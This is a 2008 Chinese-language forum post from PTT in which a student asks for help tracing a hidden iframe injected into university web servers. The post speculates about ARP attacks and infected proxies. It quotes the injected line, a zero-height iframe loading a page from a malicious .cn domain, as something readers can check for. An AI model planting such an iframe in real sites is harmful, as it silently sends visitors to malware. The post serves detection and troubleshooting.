[問題] 中毒？木馬？請大家幫忙找看看

看板MUSTMIS作者yck0210 (我的心不再流浪)時間15年前 (2008/10/22 19:59)推噓4(4推 0噓 15→)

留言19則, 6人參與討論串1/2 (看更多)

在我們系上網最近會發現學校許多Server都被掛上大陸網站隱藏語法.... 我先聲明，我不站在哪個單位，也不喜歡把技術問題給政治化！我只是想找到問題，知道問題的根源，最重要的是讓大家有一個安全無虞的網路環境～所以，如果大家也發現跟我一樣有下列的問題，請回應給我！告訴我您在哪上網的？您是瀏覽哪一個網頁才發現的？最近學校有些網站會隱藏一些會導入病毒網站的語法.... 這個語法會導致看這網頁的同時也導入到這大陸網站！至於下載什麼東西我們還不清楚，防毒軟體掃瞄本機也沒有病毒～但是有些網站會看不到內容，狀況畫面如下列二張圖片.... http://img80.imageshack.us/my.php?image=gggggttt1lf5.jpg

http://img89.imageshack.us/my.php?image=gggggttt2kf2.jpg

在這些疑似被入侵的網站內，打開網頁的原始碼的第一行會出現下列語法.... <iframe src=http ://gggggttt.cn/1/zz.htm width=100 height=0></iframe> ^^^^^^^^^^^^^^^^^^^^^^^^^^^^ => 網站故意加空格，怕有人誤連！進這些網站沒什麼問題，但有的網頁就會打不開，用防毒軟體掃也掃不到！今天我在網路上survey這個問題，發現台灣地區好像沒人反應，都是大陸在討論～我整理了一下，發現它的特性，好像是一種ARP攻擊，會造成整個區域網路都中獎！ Norton 網站所公告關於 gggggttt.cn 的說明 http://safeweb.norton.com/report/show?name=gggggttt.cn 原本我的想法如下列所述.... 很多人都知道這個問題，都掃毒了也沒發現病毒，計中說網頁也沒被竄改！在學校上網只要是連80 port會經過proxy server，也就是一般http網頁都會經過代理伺服器～如果從校外連進學校就不會經過proxy server，也很正常，所以我懷疑是proxy中毒！可是有趣的是，只有特定網站才會有這個現象，有的網站就不會有～網路上有討論說Client端跟Server端都沒問題，病毒是存在Server的記憶體裡，所以Server重開機就不會有這問題！但是問題還是沒解決，它有可能藏在SQL Server裡面，一被執行又發作了～計中說是我們資工系都中毒才會這樣，這句話讓我們系上的老師都很不爽！我曾經想過會不會是路由器被攻擊，不過路由器只處理到網路的第三層，所以應該是不太可能～系上太多電腦了，我光測我的實驗室就快吐了，有的電腦有這現象，有的沒有.... 所以，結論是，有看到這篇文章的朋友們幫我測一下，任何校內或校外的網頁都可以！看看會不會有這問題，在原始碼內的第一行會不會有那一行語法？如果有請告訴我，告訴我您在哪上網，看哪一個網頁？謝謝大家的幫忙！ -- ※ 發信站: 批踢踢實業坊(ptt.cc) ◆ From: 210.240.221.175

推

ohya74921

10/22 21:37, , 1^F

10/22 21:37, 1^F

→

yck0210

10/22 21:57, , 2^F

10/22 21:57, 2^F

→

kennedy0521

10/23 10:07, , 3^F

10/23 10:07, 3^F